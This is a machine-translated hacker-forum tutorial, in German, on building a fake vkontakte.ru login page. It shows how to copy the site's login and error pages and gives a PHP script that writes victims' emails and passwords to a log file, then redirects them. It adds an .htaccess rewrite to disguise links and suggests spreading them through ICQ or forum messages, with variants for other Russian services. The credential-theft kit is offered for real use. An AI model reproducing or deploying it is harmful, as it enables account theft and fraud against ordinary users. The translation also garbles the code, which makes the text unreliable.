This page has been robot translated, sorry for typos if any. Original content here.

Fake in Eile

[INtrO]

Um es zu tun war es nichts, es war abends ... Tatsächlich war ich bei meinem ersten Artikel (der erste bei Anti-Chat) von der Tatsache gezogen, dass es im Kauf / Verkauf / Austausch / Roll- Bereich ein Thema gibt, in dem ein Hekker Fake soviel gab 10 vmz, und oft gefragt, um diese oder jene gefälschte ...
Ich werde Ihnen einen Artikel erzählen, wie es möglich ist, eine universelle Fälschung zu spielen, fast alles, was entführt wird! Ich werde am Beispiel der gefälschten vkontakte zeigen.

[SeaRchINg]

Und so, was wir brauchen, ist, die Ressource zu wählen und alle Informationen zu sammeln, die wir brauchen, aber wir brauchen nur eine Kopie einiger Seiten. Wir gehen zu vkontakte.ru über Operu (!) . ZHmyakayem Button Eingabe, wir bekommen auf login.php, es und nehmen für den Index unserer Fälschung. Wir drücken in die Oper: Fail -> Speichern unter -> Im geöffneten Dialog unter dem Namen wählen Sie (standardmäßig gibt es ein Webarchiv ....) " HTML Fail mit Bildern " und die Grafik ist erforderlich Dateiname write index (oder login.htm - je nach Seite)


Außerdem geben wir dort unwirkliche Daten ein und wir gelangen auf die Seite, auf die es geschrieben steht
Eine solche Postanschrift ist nicht registriert oder das Passwort ist falsch.
Wir retten es auf die gleiche Weise, nur schreibe anstatt Index .
Als nächstes fahren wir in Google.ru die Phrase Vkontakte.ru, klicken Sie auf Weitere Ergebnisse mit vkontakte.ru » und suchen Sie nach etwas im Zusammenhang mit der Kontakt-Erotik ... Auf der zweiten Seite fand ich VKontakte | Fehler (http://vkontakte.ru/blank.php?code=10)- erinnern Sie sich, wir brauchen diesen Link
Усе, alles, was wir für feyka aus der Ressource brauchen, haben wir schon.

[CoDiNg]

Steuer, jetzt werden wir das Login-Formular verwenden. Öffnen Sie unsere index.html und suchen Sie nach dem Anmeldeformular.
 <Formular method = "post" name = "login" id = "login" action = "login.php">

  <Input type = "hidden" name = "success_url" id = "success_url" value = "">
  <Input type = "hidden" name = "fail_url" id = "fail_url" value = "">

  <Input type = "hidden" name = "try_to_login" id = "try_to_login" value = "1">
  <Table align = "center" cellpadding = 0 cellspacing = 7 border = 0 width = "40%">

  <Tr>
  <Td width = "100px">
  <Span class = "grau"> Email: </ span>
  </ Td>
  <Td>

  <Input class = "inputText" type = "text" name = "email" value = "id =" email "size =" 25 "/>

  <Td>
  </ Tr>
  <Tr>
  <Td>
  <Span class = "grau"> Passwort: </ span>

  </ Td>
  <Td>
  <Input class = "inputText" type = "password" name = "pass" value = "" id = "pass" size = "25" />

  </ Td>
  </ Tr>
 
  <Tr>
  <Td>
  & Nbsp;
  </ Td>
  <Td>

  <Input style = "margin-top: 1px; vertical-align: middle;"  Typ = "checkbox" name = "expire" id = "expire" value = "1" /> <small> Alien Computer </ small>

  </ Td>
  </ Tr>
  <Tr>
  <Td>
  & Nbsp;
  </ Td>
  <Td>
Von hier aus merken wir 3 Dinge:
<Formular method = "post" name = "login" id = "login" action = "login.php">
<Input class = "inputText" type = "text" name = "email" value = "id =" email "size =" 25 "/>
<Input class = "inputText" type = "password" name = " pass " value = "" id = "pass" size = "25" />
Es ist in diesen 3 Dingen, dass der erste Teil der Einzigartigkeit liegt, auf jedem sozialen Netzwerk oder emily oder anderswo, überall wird die Form des Eintrags (Feld) in dieser Art sein (gut, nur die Namen der Felder erwachen), zum Beispiel bei Klassenkameraden
<Eingabe id = "field_password" value = "" style = "width: 170px;" Typ = "Passwort" size = "20" name = " st.password ">
Ich unterscheide nur den Namen der Felder, Design-Elemente, aber die Funktion ist die gleiche für alle.
Jetzt erstellen wir eine PHP-Datei, und wir nennen es login.php , deren Inhalt:

PHP-Code:
  <? Php
 

/ *
#############
# By_NoNameZ #
###########
* /
$ F = fopen ( "log.txt" , "at" );
Flock ( $ f , 2 );
Wenn ( preg_match ( "/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/ I " , $ _POST [ 'email' ]) &&! Leer ( $ _POST [ 'Passwort' ]))) {
Fputs ( $ f , $ _POST [ 'email' ] . ; " . $ _POST [ 'Passwort' ]. \ N" );
Header ( "Ort: http: //" );
} Else {
Header ( "Ort: http: //" );
}
Flock ( $ f , 3 );
Fclose ( $ f );
?>
Betrachten Sie das Skript, ein paar Strings, aber das ist ganz normal gefälscht, seine Funktionalität:
Speichern von übertragenen Variablen, deren Überprüfung, Umleitung abhängig von der Überprüfung.

Und so kommen wir jetzt zu diesen 3 Zeilen zurück:
<Formular method = "post" name = "login" id = "login" action = " login.php ">
Hier haben wir alles in Ordnung, der Name unseres Skripts entspricht dem Namen von ihnen, es stimmt nicht überein, dann ersetzen wir es oder wir benennen es um.
<Input class = "inputText" type = "text" name = "email" value = "id =" email "size =" 25 "/>
<Input class = "inputText" type = "password" name = "pass" value = "" id = "pass" size = "25" />
Von hier brauchen wir name = " email " und name = " pass "
Wir fügen sie in unser Skript an der richtigen Stelle ein
  <? Php
 

/ *
#############
# By_NoNameZ #
###########
* /
$ F = fopen ( "log.txt" , "at" );
Flock ( $ f , 2 );
Wenn ( preg_match ( "/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/ I " , $ _POST [ 'email' ]) &&! Leer ( $ _POST [ 'pass' ]))) {
Fputs ( $ f , $ _POST [ 'email' ] . ; " . $ _POST [ 'pass' ]. \ N" );
Header ( "Ort: http: //" );
} Else {
Header ( "Ort: http: //" );
}
Flock ( $ f , 3 );
Fclose ( $ f );
?>
Wer hat es nicht bemerkt, es ist $ _POST ['email'] und $ _POST ['pass']

Als nächstes schau dir das Skript an, dann steht die Funktion IF ELSE, und wenn es sich um ein E-Mail-Feld handelt, das mit der E-Mail übereinstimmt (nickname@mylo.ru und nicht, wie die Nachricht gesendet wird) und das Passwort-Feld nicht leer ist, wird die erste Umleitung ausgeführt, aber wenn der Email nicht übereinstimmt oder Das Passfeld ist leer, dann ist das zweite das Umleitung. Daraus folgt, dass, wenn der Chell eine Seife betrat und etwas ähnliches wie ein Pass, dann werfen wir es auf die Seite mit der Erosie http://vkontakte.ru/blank.php?code=10 , und wenn ich den Müll betrat (hier brauchten wir es Kopie der Seite bad.html? Wenn wir die falschen Daten eingegeben haben), dann werfen Sie es zurück, also geben Sie bad.htm ein.

PHP-Code:
  <? Php
 

/ *
#############
# By_NoNameZ #
###########
* /
$ F = fopen ( "log.txt" , "at" );
Flock ( $ f , 2 );
Wenn ( preg_match ( "/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/ I " , $ _POST [ 'email' ]) &&! Leer ( $ _POST [ 'pass' ]))) {
Fputs ( $ f , $ _POST [ 'email' ] . ; " . $ _POST [ 'pass' ]. \ N" );
Header ( "Ort: http://vkontakte.ru/blank.php?code=10" );
} Else {
Header ( "Location: bad.htm" );
}
Flock ( $ f , 3 );
Fclose ( $ f );
?>
Wir retten den ganzen Mist auf den Server (login.php, index.htm + Ordner mit Dateien, bad.htm + Ordner mit Dateien), erstellen log.txt Datei (ich rate meinem eindeutigen Namen zu kommen. Vergessen Sie nicht, im Skript zu ändern), anziehen Ihm chmod777

3) ein kleines Update ...

Dieses Update eignet sich sehr gut für SI, am Wurzel des FTP erstellen Sie eine .htaccess- Datei mit folgendem Inhalt:

RewriteEngine On
RewriteCond% {REQUEST_FILENAME}! -f
RewriteCond% {REQUEST_URI}! Index \ .htm
RewriteRule (. *) Index.htm? [QSA]

ACHTUNG !!!
! Index \ .htm - diese Umleitung wird referenziert, wenn Sie eine fake login.html haben. Dann müssen Sie den Index in der Anmeldung umbenennen.

Taks, diese Datei gibt uns einen Link mehr qualitativ gasförmig, nämlich:
Ihr / jeder Text, wenn Sie die Link-Struktur der Fälschung kennen, zum Beispiel Kontakt, können wir dies tun:


Sie sind hier genau richtig
Und vparit es auf ICQ))) zustimmen Weniger sichtbar jetzt gefälscht))

Das ist alles

[Die eND] Eigentlich ist das eindeutig und die Tatsache, dass du deinen Klassenkameraden weitergehen kannst, auch die Seite speichern, die Variablen eingeben, die URLs ersetzen (ich gebe sofort http://odnoklassniki.ru/dk?st.cmd=error) und alles, ganz gleichermaßen Gehen Sie auf Mayile.ru, speichern Sie Variablen und ersetzen Sie und alle))) Das einzige, was Sie benötigen, ist Kreativität, wir sparen nicht die Hauptseite, sondern die Login-Seite.Sie können auch jedes Forum, wenn Sie acc ( Send an PM
<a href="file"> Link zu einem Thema </a>
, Und in der Fälschung kennst du dieses Thema für die Umleitung.